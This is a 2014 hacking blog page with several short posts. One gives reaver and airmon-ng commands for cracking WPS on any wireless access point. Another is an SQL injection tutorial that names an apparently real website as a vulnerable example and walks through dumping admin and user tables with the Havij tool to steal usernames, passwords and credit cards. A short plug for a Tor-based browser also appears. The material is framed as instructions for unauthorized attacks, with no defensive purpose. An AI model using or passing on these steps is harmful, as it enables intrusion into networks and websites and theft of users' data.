jeudi 29 mai 2014

MySQL Dorks 2014

with id parameter use this dorks in google

mardi 27 mai 2014

Wireless hacking via wps-gen



the WPS is the best way to hack any wireless AP to crack it follow these commands on backtrack or kali linux :
*  Open Terminal.
* type airmon-ng start wlan0 (this feature activate the mon0 interface )
* airmon-ng check
*kill pid(xxx) (All Pids)
*airodump-ng mon0
*reaver -i mon0 -b {"BSSID"} -c {Channel}-v (or -vv)
wait somme hours and enjoy with the wireless

            

Keep your Browsing Private:

Keep your web browsing private , by using the last & simple custom mozilla firefox portable designed by the Pirate Bay Dev Team and named the Pirate Browser .
the pirate browser is customized , added somme torrents link & the TOR Proxy , the tor proxy  give you differents ip . you can to use the Tor in her website https://www.torproject.org/ .
you can also Download the Pirate Browser the firefox Portable 29 http://Piratebrowser.com .
** the Pirate Browser Screen Shot :

SQL injection Full Explain


What's it MySQL?
MySQL is a Database , we can store any information for users data, admin, products , Other......
Is this the Mysql contains a loophole?
Yes, but not the all data bases . the Databases contain a loopholes is Vulnerable to get the databases informations it's easy to get any infos on the website EX : Usernames , Passwords , Credit Cards ...
How do you know that the site infected with this gap?
its easy add ' to the website parameter id
Example : http://www.charteradvisors.com/corner-detail.php?id=12


1)the Normal Website contain parameter id
2) When i add ' to the link the error message appear, the website is infected!
How i can to hack this website ?
easy Download #havij  on this topic
and lunch it

-------------------------------------------------------------------------------------------------------
Step 1 :
put the infected website on havij


Step 2: get  Tables on Database 

search on : user / admin / xxxxadmin /xxxxuser
and get columns


Step 3 Select Columns and Get Data:


Havij 1.10

Exploit The infected websites by #havij easily , the program has been developped by itsecteam for exploiting the infected MYSQL Websites , the software isn't for free